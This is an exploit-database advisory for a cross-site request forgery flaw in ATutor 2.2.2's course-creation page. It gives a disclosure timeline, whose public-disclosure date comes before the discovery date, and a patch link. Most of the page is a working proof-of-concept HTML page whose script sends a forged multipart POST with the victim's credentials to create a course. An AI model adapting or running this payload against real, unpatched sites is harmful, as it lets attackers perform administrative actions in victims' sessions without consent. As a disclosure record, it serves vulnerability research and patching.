ATutor 2.2.2 Cross Site Request Forgery

2016.11.15
Credit: Saravana Kumar
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: ATutor_2.2.2 Learning Management System # Cross-Site Request Forgery (Add New Course) # Date: 13-11-2016 # Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2 # Vendor: http://www.atutor.ca/ # Exploit Author: Saravana Kumar # Contact: https://facebook.com/06saravanakumar # Category: webapps # Version: 2.2.2 # Platform: PHP # Tested on: [Kali Linux 2.0 | Windows 7] # Email: 06saravanakumar@gmail.com # Affected URL: http://localhost/ATutor/mods/_core/courses/users/create_course.php ================================== Vulnerability Disclosure Timeline:a"==================================a"2016-11-07: Found the vulnerability and Reported to Vendor.a"2016-11-08: Vendor Replied.a"2016-11-10: Vendor Fixed the vulnerability.a"2016-11-11: Patch releaseda"2016-10-12: Public Disclosure ########################### CSRF PoC ############################### <html> <------ CSRF POC ------> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281"); xhr.withCredentials = true; var body = "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"form_course\"\r\n" + "\r\n" + "true\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + "\r\n" + "819200\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"course\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"old_access\"\r\n" + "\r\n" + "protected\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"created_date\"\r\n" + "\r\n" + "2016-11-07 06:55:20\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"show_courses\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"current_cat\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"title\"\r\n" + "\r\n" + "Programming Language\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"pri_lang\"\r\n" + "\r\n" + "en\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"description\"\r\n" + "\r\n" + "Python\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"category_parent\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"content_packaging\"\r\n" + "\r\n" + "top\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"rss\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"access\"\r\n" + "\r\n" + "protected\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"release_date\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"day_release\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"month_release\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"year_release\"\r\n" + "\r\n" + "2016\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"hour_release\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"min_release\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"end_date\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"day_end\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"month_end\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"year_end\"\r\n" + "\r\n" + "2017\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"hour_end\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"min_end\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"setvisual\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"banner\"\r\n" + "\r\n" + "\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"initial_content\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"quota\"\r\n" + "\r\n" + "-2\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"filesize\"\r\n" + "\r\n" + "-3\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"tracking\"\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"copyright\"\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"boolForce\"\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"icon\"\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + "\r\n" + "819200\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"custOptCount\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"courseId\"\r\n" + "\r\n" + "\r\n" + "-----------------------------34481053430281\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "Save\r\n" + "-----------------------------34481053430281--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> --------------------------------------------------------------------------- Solution: Patch is available. Install patch using the ATutor Patcher. Link to download patch: http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml ---------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top